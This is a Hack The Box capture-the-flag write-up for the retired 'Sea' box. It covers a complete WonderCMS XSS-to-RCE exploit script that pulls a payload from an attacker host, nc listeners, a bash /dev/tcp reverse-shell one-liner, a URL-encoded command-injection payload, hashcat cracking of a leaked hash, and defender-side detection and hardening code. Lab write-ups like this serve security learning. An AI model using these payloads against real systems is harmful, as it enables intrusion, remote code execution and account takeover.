HTB Writeup Sea
Hacking 101 : Hack The Box Writeup 02
Sea is a retired Linux box on HTB with an easy difficulty rating, but the fuzzing part can be quite puzzling.
This is the write-up on how I hacked it. I encourage you to try finding the loopholes on your own first. 😊
I try to write one write-up (maybe two, if I get time) every week here on Medium, and they also get pushed to my GitHub.
First things first, we will start with an Nmap scan to check for open ports.
nmap -sC -sV 10.129.197.88
From the result, we find 2 open ports.
Since the HTTP port is open, we can visit the webpage using the IP address.
Under the “How To Participate” section, we can see a link to the contact page.
Upon clicking that link we are redirected to “sea.htb/contact.php”, so let's pause here to add the IP address and domain to our /etc/hosts file.
The “Contact Us” page has a form for completing registration, but it appears to be a dead end with little to enumerate.
So let's go back to the main page http://sea.htb and try to gather some intel.
Let's start by searching for directories and see whether it has any:
We will use dirb this time:
dirb http://sea.htb
Fuzzing on this box is challenging and not the best experience.
To continue fuzzing, we used ffuf with a dedicated wordlist. It's worth mentioning that you can also pass a wordlist to dirb.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://sea.htb/themes/FUZZ" -c -v
ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://sea.htb/themes/bike/FUZZ" -t 200 -fc 403
Upon visiting http://sea.htb/themes/bike/README.md, we find some instructions.
Here, we discover that WonderCMS is being used as the backend CMS. To check the version, we navigate to http://sea.htb/themes/bike/version, which shows 3.2.0.
After consulting the internet, we learn that WonderCMS v3.2.0 is vulnerable to CVE-2023-41425, a cross-site scripting (XSS) vulnerability.
With a bit more googling we found a public exploit for it as well.
You can find the exploit online, but to simplify things, you can copy the code from below. Remember to change the IP address in the urlRev line (10.10.14.45) to match your attacking machine.
Save the script as exploit.py.
# Exploit: WonderCMS XSS to RCE
import sys
import os

if len(sys.argv) < 4:
    print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
    # JavaScript that runs in the admin's browser once the XSS fires: it reads the
    # CSRF token from the page, asks WonderCMS to install a "theme" from the zip on
    # our HTTP server, then calls the dropped rev.php with our listener address.
    data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
    url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = "http://sea.htb";
var token = document.querySelectorAll('[name="token"]')[0].value;
// change 10.10.14.45 below to your attacking machine's IP
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.45:8000/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
    if (xhr3.status == 200) {
        var xhr4 = new XMLHttpRequest();
        xhr4.withCredentials = true;
        xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
        xhr4.send();
        xhr4.onload = function() {
            if (xhr4.status == 200) {
                var ip = "'''+str(sys.argv[2])+'''";
                var port = "'''+str(sys.argv[3])+'''";
                var xhr5 = new XMLHttpRequest();
                xhr5.withCredentials = true;
                xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
                xhr5.send();
            }
        };
    }
};
'''
    try:
        # write the payload to disk and serve it over HTTP so the injected <script src> can fetch it
        open("xss.js", "w").write(data)
        print("[+] xss.js is created")
        print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
        print("----------------------------\n")
        XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
        XSSlink = XSSlink.strip(" ")
        print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
        print("----------------------------\n")
        print("\nstarting HTTP server to allow the access to xss.js")
        os.system("python3 -m http.server\n")
    except: print(data,"\n","//write this to a file")
After saving the file, run this command to generate the malicious link. Ensure that you replace the IP address with your own.
python3 exploit.py http://sea.htb/index.php?page=LoginURL 10.10.14.35 4444
Now start the nc listener on port 4444
nc -lnvp 4444
Now, return to the registration form and use the malicious link to establish a reverse shell. Enter random details, but ensure you paste the link in the website section.
After waiting a minute or two, we see activity on our listener: we have a shell back.
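From the defender's side, the chain above leaves a recognisable trail in the web server's access log: a loginURL request carrying a script tag, an installModule request pointing at a host the site does not normally fetch themes from, and a request to a PHP file under /themes/ with lhost/lport parameters. The following is an added example (not part of this writeup or of WonderCMS) that flags those three patterns over constructed log lines; the trusted-host list and the log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (not from the box) mirroring the request chain above:
# the crafted loginURL link with an injected <script src>, the installModule call
# fetching a zip from an external host, the request to the dropped PHP file, and a
# benign request for contrast.
SAMPLE_LOG = """\
10.10.14.45 - - [10/Aug/2024:10:01:02 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.45:8000/xss.js%22%3E%3C/script%3E HTTP/1.1" 200 512
127.0.0.1 - - [10/Aug/2024:10:01:40 +0000] "GET /?installModule=http://10.10.14.45:8000/main.zip&directoryName=violet&type=themes&token=abc HTTP/1.1" 200 88
127.0.0.1 - - [10/Aug/2024:10:01:41 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.45&lport=4444 HTTP/1.1" 200 0
10.10.14.45 - - [10/Aug/2024:10:02:00 +0000] "GET /themes/bike/README.md HTTP/1.1" 200 1337
"""

LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')

# Hosts a module/theme download is expected to come from. Assumption: WonderCMS
# fetches its official themes from GitHub, so anything else is worth a look.
TRUSTED_MODULE_HOSTS = {"github.com", "www.github.com"}

def check_request(target, trusted=TRUSTED_MODULE_HOSTS):
    """Return the names of the rules that fire for one request target."""
    hits = []
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    decoded = unquote(target).lower()
    # Rule 1: script injection riding on the loginURL page parameter.
    if "page=loginurl" in decoded and ("<script" in decoded or "javascript:" in decoded):
        hits.append("xss_in_loginurl")
    # Rule 2: installModule pointing at a host that is not a trusted module source.
    for url in query.get("installModule", []):
        if (urlsplit(url).hostname or "") not in trusted:
            hits.append("untrusted_installModule_source")
    # Rule 3: a PHP file under /themes/ invoked with reverse-shell style parameters.
    if parts.path.startswith("/themes/") and parts.path.endswith(".php") and {"lhost", "lport"} & set(query):
        hits.append("themes_php_with_shell_params")
    return hits

def scan_log(text):
    """Return (source_ip, target, hits) for every parsed line that trips a rule."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            hits = check_request(m.group("target"))
            if hits:
                alerts.append((m.group("src"), m.group("target"), hits))
    return alerts
```

Running scan_log(SAMPLE_LOG) flags the first three lines, one rule each, and leaves the README.md request alone.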
Now to make the shell more stable and usable , run this command.
script /dev/null -c bash
Enumerating the filesystem, we find the WonderCMS database at /var/www/sea/data/database.js. Reading this file shows a password hash:
We have a password hash, but we still don't have a username, so we check the /etc/passwd file to see which users have a login shell.
First we have to crack the password hash; we will use hashcat for it. Save the hash into a text file named hash.txt.
echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' > hash.txt
Then use hashcat to crack bcrypt hashes.
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Now that we have both the user and the password, we can su to that user and enter the password we just found.
User:amay
Password:mychemicalromance
After a successful attempt, we can read the user flag at /home/amay/user.txt.
Privilege Escalation
Let's start by checking whether any other ports are open internally.
netstat -ntlp
We can see that port 8080 is open internally. We forward that port to our local machine using SSH.
Open a new terminal on your Linux machine and type:
ssh amay@sea.htb -L 8080:127.0.0.1:8080
We will use the same password for amay as before.
Now open your browser, go to 127.0.0.1:8080 and log in with amay's credentials. You will see an interface like this.
Now fire up Burp; we will need to intercept a request.
After turning on the proxy, click Analyze on the web interface, capture the request and send it to Repeater.
Now we will tamper with the log_file parameter to check for command injection. Without knowing anything about the backend functionality, we can still test for it by injecting a command that creates a new file. Let's do it.
Add this to your log_file parameter.
;touch /tmp/test.txt
Then send the req.
Now we check the filesystem to see whether the file /tmp/test.txt has been created.
We have successfully gained code execution through a simple command injection.
Let's get a reverse shell using the following payload.
Before that, open a new terminal and start a listener on port 4444.
This is the reverse-shell payload; make sure to use your own IP.
bash -c 'bash -i >& /dev/tcp/10.10.14.45/4444 0>&1'
It has to be URL-encoded; after encoding, send it.
log_file=%2Fvar%2Flog%2Fapache2%2F;bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.45/4444+0>%261'&analyze_log=
After sending the request we obtain a root shell.
We can read the Root flag from /root/root.txt .
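The root cause on the 8080 service is a log_file value reaching a shell unescaped. As an added example (not the box's own code; the allowed directory and the status-count analysis are assumptions), here is the vulnerable pattern beside a hardened handler that validates the path against a base directory, refuses shell metacharacters and does the work in-process without a shell.

```python
import os
import re
import tempfile

# Hardened handling for the log_file parameter abused above. Added example, not the
# Sea box's own code; the allowed directory and the analysis it performs are assumptions.
ALLOWED_LOG_DIR = "/var/log/apache2"
SHELL_META = set(";|&`$()<>\n\r")
STATUS_RE = re.compile(r'" (\d{3}) ')

def vulnerable_command(log_file):
    """The bug class exploited above: the parameter is spliced into a shell string, so a
    value ending in ';touch /tmp/test.txt' becomes a second command. Never executed here."""
    return f"cat {log_file} | grep -c ' 200 '"

def is_safe_log_path(log_file, allowed_dir=ALLOWED_LOG_DIR):
    """Reject shell metacharacters and any path that resolves outside allowed_dir."""
    if not log_file or any(c in SHELL_META for c in log_file):
        return False
    real = os.path.realpath(log_file)
    base = os.path.realpath(allowed_dir)
    return os.path.commonpath([base, real]) == base

def analyze_log(log_file, allowed_dir=ALLOWED_LOG_DIR):
    """Validate first, then count HTTP status codes in-process: no shell involved."""
    if not is_safe_log_path(log_file, allowed_dir):
        raise ValueError("log_file rejected: " + repr(log_file))
    counts = {}
    with open(os.path.realpath(log_file), encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = STATUS_RE.search(line)
            if m:
                counts[m.group(1)] = counts.get(m.group(1), 0) + 1
    return counts
# Constructed access-log lines used by demo(); not taken from the box.
SAMPLE_LINES = [
    '127.0.0.1 - - [10/Aug/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512',
    '127.0.0.1 - - [10/Aug/2024:10:00:01 +0000] "GET /themes/bike/x HTTP/1.1" 403 0',
    '127.0.0.1 - - [10/Aug/2024:10:00:02 +0000] "GET /missing HTTP/1.1" 404 0',
    '127.0.0.1 - - [10/Aug/2024:10:00:03 +0000] "GET /contact.php HTTP/1.1" 200 900',
]

def demo():
    """Write the sample lines under a temporary allowed_dir and analyze them there."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "access.log")
        with open(path, "w") as fh:
            fh.write("\n".join(SAMPLE_LINES) + "\n")
        return analyze_log(path, allowed_dir=tmp)
```

With this in place the ;touch /tmp/test.txt value from above is refused before anything runs, and so is a traversal such as /var/log/apache2/../../etc/passwd.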
Congrats🥰 and have a good day ahead hacker.